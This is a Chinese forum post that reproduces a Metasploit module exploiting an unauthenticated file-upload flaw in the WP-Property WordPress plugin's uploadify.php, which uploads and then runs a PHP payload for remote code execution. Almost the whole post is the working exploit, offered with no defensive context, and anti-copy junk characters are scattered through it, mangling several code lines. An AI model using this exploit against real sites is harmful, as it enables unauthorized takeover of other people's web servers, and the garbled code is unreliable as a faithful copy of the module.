WordPress WP-Property PHP 文件上传漏洞
. B# `7 ^- x( c, i) R7 s: v9 E M- }; K' q
## # This file is part of the Metasploit Framework and may be subject to
5 d4 U- v7 ~) l4 i! ^% r, i, y% G v$ p. E0 y
# redistribution and commercial restrictions. Please see the Metasploit2 j2 a+ b' L7 w9 w9 G+ q
/ V" k' s' S8 l, S$ G ^; g# Framework web site for more information on licensing and terms of use.
' `# w% P/ D3 l5 q4 t% \- g/ _7 h% D! l) E0 w4 A- c
# http://metasploit.com/framework/ ##
+ r" q, a( Z ^+ w p
* ]7 W" T+ p2 N. f* m1 z! p
( z- E( x5 H" j# t* y8 A
6 ]) M: V5 o; Q/ ~& L
: F G) @5 T# l* y# i, s! \7 ^
3 G8 Y {- E. V8 `( P8 Yrequire 'msf/core'
, v6 \+ }3 f2 M4 O) ?6 a# Yrequire 'msf/core/exploit/php_exe'
% q( p. N0 G4 [; c& O: k( N5 C4 j$ h' ~( t- z0 m5 b
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
8 K; r0 c8 s& y% E; s/ X: E'Description' => %q{
. m( N- U4 \/ d' jThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>7 s+ b0 N4 r) n. N" J2 n
[
2 z6 L- n3 @& Q( ?'Sammy FORGIT', # initial discovery
! g8 A( g8 U8 L' m4 n1 h! o' z'James Fitts <fitts.james[at]gmail.com>' # metasploit module! f2 u3 o% t. Q6 D n" t& ?
],( L' a6 `6 U! x5 R( r" w- u% W
'License' => MSF_LICENSE,) X0 ^0 X3 L# e: ]6 Y6 \
'References' =>
# a0 O2 @* W2 l* ?[! C, J* u- \+ l g* G) M, _
[ 'OSVDB', '82656' ],
, @; O0 @+ q8 K, o8 c[ 'BID', '53787' ],5 m/ o# O! y' @2 H; e* E0 t
[ 'EDB', '18987'],
" L7 X" i, @$ v( y: H% a5 ~[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]% I; d0 P+ A: ~& \8 _$ w7 L; E- W4 ?
],
1 x: K ]" U5 p5 E, a7 ?' J4 w'Payload' =>" Q3 x& i" j3 a9 ]4 C! R% W# X& P
{
0 B& }6 x! @$ F% J0 w'BadChars' => "\x00",
! O2 A2 j: [% Y; q& `},( O+ |5 K3 b2 D
'Platform' => 'php',! e# |, }( z) I
'Arch' => ARCH_PHP,
: {) D% {8 U6 {+ O1 o'Targets' =>! C& }( H* m6 m5 y( T. K
[5 c7 ? k+ e9 c9 U# x
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ]," o: ~3 h9 W3 _ C& U
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]1 l% F' x! o3 |) Z# S# T s0 D1 J
],+ @* Q5 N/ y9 a
'DefaultTarget' => 0,
( Y9 G V# i; \0 ?. o# b% Z* Q'DisclosureDate' => 'Mar 26 2012'))
u% k4 J" Z4 u
* `$ f3 L: A& ~3 Gregister_options(& P- \# n/ ?, x8 i% e/ k/ p
[; Y7 v9 w9 U- V+ j& m5 C; C; Z
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
) W) z& F, B; `% |], self.class)1 U+ t; ^* ?8 Q4 }$ I, d0 g
end5 t F3 t8 }( H% k
! C7 X3 t& k* z6 p# U' e* V
def check9 Z( d! t% Y8 @9 N2 n5 G- L% K
uri = target_uri.path
5 H3 b( R1 q) H7 m4 curi << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
+ F; b! A8 `' l% ^'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"1 T0 D( r& v" P0 \- R& d
})
0 c' _: n# ~/ A4 F7 p3 I) _( J: D! L8 G9 q
if not res or res.code != 200: K, \ d' q/ I/ J4 l/ ~4 C" v9 M
return Exploit::CheckCode::Unknown
- e) j9 {' h. M2 W b9 R4 C" Xend
@8 ]# K4 I5 k2 }1 _
5 {8 v$ M3 }# Q( Creturn Exploit::CheckCode::Appears
4 T& {* j$ e2 ]end
+ ~2 K8 K4 Z! c ?3 W0 m1 Q6 m7 I' Z( M
def exploit
( |+ x6 Z+ V6 V4 m( @, z* Q/ xuri = target_uri.path
/ W+ u: V- A- K" ] Y0 p Muri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)6 }, [. m0 M' v- O/ C3 `' K
& O* Z% ]# M$ [1 P5 B$ q. _: s/ _
data = Rex::MIME::Message.new8 z9 G. k" Q# J6 {- Q7 \
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
( Z0 N0 O4 D3 ~data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")& G8 L9 s1 z) D. o* z8 L% S2 o
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')7 O0 v& I( ?8 V S6 V; W
9 Q; ], Z! [+ V6 e# Y( L8 lprint_status("#{peer} - Uploading payload #{@payload_name}")
/ ?. e+ v0 j c3 a, y. m" d. cres = send_request_cgi({$ Q) n) c& X) a3 d8 q& P! e
'method' => 'POST',
+ D1 X7 Y9 Z: _9 l. P6 z'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
- R* z$ r3 u9 c' Y'ctype' => "multipart/form-data; boundary=#{data.bound}",
% w5 e% j7 p: o'data' => post_data
p1 T$ w1 A* x+ b})2 t2 }+ [& W( x8 B- G
9 E/ ]: n( w4 P- kif not res or res.code != 200 or res.body !~ /#{@payload_name}/
{9 a3 J B- f1 R4 m) ]9 W. h- t5 Sfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") j3 ~$ a. y$ y5 Q. z( Z$ R7 q
end
+ o: b# }$ F, u+ `8 j, l4 i W r& a/ H2 h6 ~& H( m9 v7 w
upload_uri = res.body
2 p$ C) v h% `! ^( E7 q, G/ u! _
: a9 S- i) a) Y; z- |$ d! A5 p* h' Eprint_status("#{peer} - Executing payload #{@payload_name}")
' N' w" T! O0 e Wres = send_request_raw({
9 E7 ]3 B( w5 B T'uri' => upload_uri,
5 ?/ l. c, u# b2 r+ I/ d9 }'method' => 'GET'
! ^* ^( `* m5 A T$ |8 y3 r})( V% g" W1 }0 Y! T0 Z" {
end7 i: O( I* T7 l. N
end* u2 e" d/ F* i+ p8 [5 |
) i' e; l: J i: p5 N# ]# r
不要问我这写的是什么 怎么利用 我是说msf.: Y: f5 F7 H, q) F
& x1 |" M v1 O5 ~# D
|
发表于 2013-1-4 19:51:30
收藏
支持
反对